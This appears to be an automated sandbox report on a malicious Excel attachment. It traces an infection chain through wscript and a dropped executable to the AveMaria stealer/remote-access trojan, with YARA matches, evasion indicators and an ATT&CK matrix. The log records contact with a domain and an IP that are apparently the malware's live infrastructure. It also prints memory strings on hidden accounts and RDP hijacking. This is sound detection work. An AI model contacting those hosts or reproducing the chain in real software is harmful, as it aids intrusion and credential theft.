                Source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                Source: server1_protected[1].exe.5.dr, Module2.csCryptographic APIs: 'TransformFinalBlock'
                Source: NXRWIG.exe.5.dr, Module2.csCryptographic APIs: 'TransformFinalBlock'
                Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@10/17@4/1
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbsJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeMutant created: NULL
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8A44.tmpJump to behavior
                Source: .doc.4.drOLE indicator, Word Document stream: true
                Source: Pago.xlsOLE indicator, Workbook stream: true
                Source: Pago.xls.0.drOLE indicator, Workbook stream: true
                Source: 57230000.0.drOLE indicator, Workbook stream: true
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs"
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Pago.xlsReversingLabs: Detection: 47%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs"
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe"
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs" Jump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: credssp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: C:\Users\PROG-MAX\Desktop\TOPROTECT\Protected\server1_protected.pdb source: NXRWIG.exe, 00000008.00000000.517113620.0000000000152000.00000020.00000001.01000000.00000004.sdmp, NXRWIG.exe.5.dr, server1_protected[1].exe.5.dr
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\server1_protected[1].exeJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Contains functionality to hide user accounts
                Source: NXRWIG.exe, 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: NXRWIG.exe, 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                Source: NXRWIG.exe, 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                Source: NXRWIG.exe, 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeMemory allocated: 370000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeMemory allocated: 22D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeMemory allocated: 550000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\wscript.exe TID: 3456Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe TID: 3808Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\System32\wscript.exeDomain query: www.stipamana.com
                Source: C:\Windows\System32\wscript.exeNetwork Connect: 87.121.86.205 443Jump to behavior
                Document contains VBA stomped code (only p-code) potentially bypassing AV detection
                Source: .doc.4.drOLE indicator, VBA stomping: true
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected AveMaria stealer
                Source: Yara matchFile source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: NXRWIG.exe PID: 3796, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected AveMaria stealer
                Source: Yara matchFile source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information431
                Scripting                		Valid Accounts33
                Exploitation for Client Execution                		431
                Scripting                		111
                Process Injection                		1
                Masquerading                		11
                Input Capture                		1
                Security Software Discovery                		Remote Services11
                Input Capture                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Obfuscated Files or Information                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		LSASS Memory41
                Virtualization/Sandbox Evasion                		Remote Desktop Protocol11
                Archive Collected Data                		2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                DLL Side-Loading                		Logon Script (Windows)41
                Virtualization/Sandbox Evasion                		Security Account Manager1
                Remote System Discovery                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
